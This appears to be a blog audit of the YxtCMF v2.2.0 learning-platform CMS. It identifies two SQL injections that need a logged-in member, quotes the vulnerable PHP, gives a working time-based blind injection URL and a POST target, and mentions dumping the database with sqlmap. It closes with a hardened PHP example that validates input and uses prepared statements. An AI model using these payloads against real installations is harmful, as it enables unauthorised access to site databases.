A Simple Audit of YxtCMF

A niche CMS; download address: http://down.admin5.com/php/133101.html

YxtCMF v2.2.0 is an online learning platform built on the thinkphp + bootstrap framework. It has two injection points, though both require a logged-in member.

The site has no protection against injection at all; even if gpc is enabled, /index.php turns it off for you.


Injection 1: requires logging in first.
Defective code: the incoming $state is not filtered.
public function order(){
    $state=I("get.state");
    $user_id=sp_get_current_userid();
    $where=empty($state)?array("user_id = $user_id"):array("user_id = $user_id and state=$state");//the incoming $state is spliced into the where string without any filtering
    $count=$this->order_obj->where($where)->count();
    $page = $this->page($count, 10);
    $data=$this->order_obj->limit($page->firstRow . ',' . $page->listRows)->where($where)->select();
    $num=$this->order_obj->where(array('state'=>2,'user_id'=>$user_id))->count();
    $this->assign('num',$num);
    $this->assign('order',$data);
    $this->assign('state',$state);
    $this->assign("Page", $page->show('Admin'));
    $this->display(':order');
}
http://127.0.0.1/yxtcmf/index.php?g=user&m=center&a=order&state=1) AND (SELECT * FROM (SELECT(SLEEP(5)))pror) AND (8565=8565



Injection 2: requires the following steps: log in, then apply to become a teacher.


The incoming type_id is not filtered.
In application\Teacher\Controller\CenterController.class.php:
although the add function is commented out here, add_post is not.

function add_post(){
    if (IS_POST) {
        $data = $this->course_obj->create();
        $count=$this->course_obj->count();
        $term_id=$_POST['type_id'];
        $typedata=$this->coursetype_obj->where("term_id=$term_id")->find();//defective line: the incoming type_id goes into the where string unfiltered
        $teacherdata=M('application')->where(array('user_id'=>sp_get_current_userid()))->find();
        $data['cs_teacher']=sp_get_current_userid();
        $data['top_id']=$typedata['parent'];
        $data['cs_picture']=$_POST['cs_picture'];
        $data['labelid']=$_POST['labelid'];
        $deta['notice']=$_POST['code'];//the quoted code uses $deta (not $data) here; left as the page shows it
        $deta['count']=$_POST['count'];
        $data['cs_addtime']=date('Y-m-d H:i:s');
        $data['cs_state']=1;
        $data['cs_brief']=htmlspecialchars_decode($data['cs_brief']);
        $data['course_type']=$_POST['type'];
        $data['stu_numbers']=$_POST['stu_numbers'];
        if($teacherdata['state']<1){
            $this->error("您还未通过审核,暂时不能添加课程!");
        }

        if($deta['notice']=='sucess'){
            if ($this->course_obj->add($data)) {
                $this->success("添加成功!",U("Teacher/Center/index"));
            }else{
                $this->error("添加失败!");
            }
        }else{
            if($count>=$deta['count']){
                $this->error($deta['notice']);
            }else{
                if ($this->course_obj->add($data)) {
                    $this->success("添加成功!",U("Teacher/Center/index"));
                }else{
                    $this->error("添加失败!");
                }
            }
        }
    }

}

http://172.16.9.31/yxtcmf/index.php?g=teacher&m=center&a=add_post

post: type_id=1

Since no filtering is done, sqlmap can dump it directly.
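Both sinks on this page share one root cause: a request parameter (state in order(), type_id in add_post()) is spliced into the WHERE string, and the page notes the site has no other layer of protection. The block below is an added example, not YxtCMF or ThinkPHP code, showing the pattern a fix for either sink should follow: reject anything that is not an integer before it reaches the query, then bind the value with a prepared statement. It uses PDO with an in-memory SQLite table constructed inline so it runs on a stock php-cli; the table and column names (orders.user_id, orders.state, coursetype.term_id, coursetype.parent) are taken from the code on the page, the row data is made up. In ThinkPHP 3.2 itself the equivalent is I('get.state', 0, 'intval') for the read and passing an array condition to where() so the framework quotes the value, rather than a string with the variable spliced in.

```php
<?php
// Added example (not YxtCMF code). Demonstrates the fix pattern for the two
// sinks on this page: validate the parameter's type, then bind it.
// Runs stand-alone with php-cli + pdo_sqlite; the fixture below is constructed.
declare(strict_types=1);

/** Return $value as a non-negative integer, or null if it is not one. */
function intParam($value): ?int {
    // FILTER_VALIDATE_INT accepts only a whole integer; "1 OR 1=1" comes back
    // as false instead of being truncated to 1 the way a bare (int) cast would.
    $n = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $n === false ? null : $n;
}

/** Hardened equivalent of order(): state is optional, but when present must be an integer. */
function countOrders(PDO $db, int $userId, $rawState): int {
    $sql    = 'SELECT COUNT(*) FROM orders WHERE user_id = :uid';
    $params = [':uid' => $userId];
    if ($rawState !== null && $rawState !== '') {
        $state = intParam($rawState);
        if ($state === null) {
            throw new InvalidArgumentException('state must be an integer');
        }
        $sql .= ' AND state = :state';   // the SQL text never contains user input
        $params[':state'] = $state;
    }
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return (int) $stmt->fetchColumn();
}

/** Hardened equivalent of the coursetype lookup in add_post(). */
function findCourseType(PDO $db, $rawTermId): ?array {
    $termId = intParam($rawTermId);
    if ($termId === null) {
        return null;                     // no query is built for a non-integer id
    }
    $stmt = $db->prepare('SELECT term_id, parent FROM coursetype WHERE term_id = :tid');
    $stmt->execute([':tid' => $termId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- constructed fixture (schema names from the page, rows made up) --------
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE orders (id INTEGER PRIMARY KEY, user_id INTEGER, state INTEGER)');
$db->exec('CREATE TABLE coursetype (term_id INTEGER PRIMARY KEY, parent INTEGER)');
$db->exec('INSERT INTO orders (user_id, state) VALUES (7, 1), (7, 2), (8, 1)');
$db->exec('INSERT INTO coursetype (term_id, parent) VALUES (1, 0), (5, 1)');

$checks = [
    countOrders($db, 7, null) === 2,                 // no state filter
    countOrders($db, 7, '1') === 1,                  // normal integer state
    (int) findCourseType($db, '5')['parent'] === 1,  // normal lookup
    findCourseType($db, '1 OR 1=1') === null,        // non-integer: rejected before SQL
    findCourseType($db, '9') === null,               // integer but unknown id
];
try {
    countOrders($db, 7, '1 OR 1=1');
    $checks[] = false;                               // must not be reached
} catch (InvalidArgumentException $e) {
    $checks[] = true;                                // rejected with a clear error
}

$ok = !in_array(false, $checks, true);
echo $ok ? "all checks passed\n" : "a check failed\n";
exit($ok ? 0 : 1);
```

Save as fix_example.php and run `php fix_example.php`; the exit code is 0 when every check holds. The design point is that validation and binding are separate defences: intParam() stops a malformed value from ever reaching the database, and the prepared statement means that even a value which slipped past validation would be sent as a literal, not as SQL text.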





©2019 CSDN